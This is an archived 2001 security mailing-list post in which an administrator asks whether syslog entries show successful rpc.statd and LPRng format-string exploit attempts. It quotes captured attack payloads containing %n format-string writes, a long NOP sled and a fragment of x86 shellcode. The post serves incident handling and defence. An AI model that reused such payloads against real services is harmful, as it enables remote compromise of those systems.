rpc.statd exploit attempts?

From: Remco B. Brink (remcoat_private)
Date: Wed Jun 27 2001 - 02:56:25 PDT

  • Next message: Pavel Lozhkin: "Re: massive lpr exploit attempt" 

    Hi,

during the last couple of days I've been recieving what I expect are
rpc.statd exploit attempts. I'm not entirely sure however as to what
degree these attacks are successful or false alerts and am hoping
that people here might be able to shed some more light on this.

Syslog shows me the same following message, sometimes several in a row:

Jun 26 16:48:11 grolsch rpc.statd[382]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

I also quite frequently see the following message fly by:

Jun 26 20:38:40 grolsch SERVER[14529]: Dispatch_input: bad request line 'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2201Û1É1À°FÍ\200\211å1Ò²f\211Ð1É\211ËC\211]øC\211]ôK\211Mü\215MôÍ\2001É\211

According to Snort this last message is an "EXPLOIT x86 NOOP", which all 
originate from the same IP address (which is not local to my network, nor 
is it familiar). Is this also rpc.statd related?

Were the attacks succesful? Where should I go from here?

regards,
Remco

-- 
Remco B. Brink - SOL Børs A/S systemsdeveloper - http://www.norge-invest.no
Personal site at http://rc6.org  -  PGP/GnuPG key at http://rc6.org/rbb.pgp

panic("Lucy in the sky....");
	2.2.16 /usr/src/linux/arch/sparc64/kernel/starfire.c



----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com

    This archive was generated by hypermail 2b30 : Wed Jun 27 2001 - 18:47:18 PDT